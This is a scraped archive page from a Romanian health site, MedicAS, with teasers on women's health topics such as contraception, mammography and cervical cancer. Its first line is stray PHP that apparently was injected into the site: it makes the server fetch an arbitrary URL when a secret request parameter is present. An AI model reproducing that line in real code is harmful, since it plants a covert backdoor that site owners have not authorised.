isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Pentru Ea - MedicAS

Arhiva pentru categoria 'Pentru ea'

O sarcina nedorita este cosmarul oricarei femei. Si cu siguranta momentele frumoase care au dus la aparitia ei anuleaza clipele de suferinta fizica si psihica pentru intreruperea ei. Dar, cum spune si zicala, “ochii vad, inima cere…”, exista clipe cind nu ne putem problema ca se poate intimpla ceva rau ulterior. Insa exista si o solutie salvatoare, contraceptivele “de a doua zi”, pe care ea le poate lua si …preveni aparitia unei sarcini. Ce efecte secundare au si cum trebuie utilizate aflati mai departe…


Ea, viitoarea mamica, vrea sa aiba copii sanatosi. Iar acum exista o metoda prin care, in cazuri mai putin fericite, copilul poate fi ajutat peste ani, daca la nastere se preleveaza celule stem din sangele placentar. Este o procedura simpla, efectuata la venirea pe lume a bebelusului, care acum se poate face si in Romania.


Astazi cancerul mamar, ucigasul redutabil, poate fi infrant. Ea, prietena, sotia, mama sau cunostinta noastra poate evita o imensa suferinta…Trebuie doar sa fie informata, sa se controleze periodic, sa aiba un regim de viata echilibrat. Si sansele, sau mai bine zis, nesansele, de a face un cancer mamar se reduc foarte mult.


O persoana informata poate lua niste decizii corecte la un moment dat pentru ca are toate datele problemei. Facand o paralela, putem spune ca informandu-se corect despre metodele contraceptive, ea poate evita o sarcina nedorita, el…sa devina tatic atunci cand nu e pregatit. Este pacat sa apara intreruperi de sarcina, copii nedoriti, abandonuri, datorita unei ignorante nejustificate. Puteti incepe, citind mai departe, sa fiti mai informati in legatura cu metodele contraceptive.


Exista un moment in viata fiecarui cuplu in care, pe langa toate momentele de fericire, dragoste si bucurii, la un moment dat lipseste ceva… Si anume ce? O noua fiinta care sa le lumineze casa si viata… Pentru ca nasterea unui copil inseamna cea mai mare implinire si succes… Uneori asta pare destul de simplu pentru unele cupluri, dar poate fi si o adevarata problema atunci cand nu se obtine o sarcina asa de simplu cum ar trebui sa fie.


Între investigaţiile medicale obligatorii pentru o femeie trecută de 35 de ani, preocupată de sănătatea ei, se află si mamografia. Este un examen relativ simplu, cu costuri nu foarte mari si absolut necesar pentru depistarea precoce a unei boli cu consecinţe devastatoare uneori: cancerul de sân. Nu uitaţi: trebuie să efectuaţi o mamografie la 2 ani sau atunci când un medic specialist endocrinolog, chirurg sau ginecolog vă recomandă.


Cancerul colului uterin

17 March, 2008

Toţi ne înfiorăm când auzim cuvântul cancer. Şi o problemă de sănătate, care din păcate ne poate umbri şi scurta viaţa este cancerul de col uterin. Putem să evităm factorii de risc sau putem, printr-un examen simplu, să-l depistăm la timp. Depinde de noi să fim preocupate mai mult de sănătatea noastră şi să ne informăm.


 
 

Newsletter

Loading... Loading...
 
 

Aceasta este arhiva articolelor din categoria Pentru ea.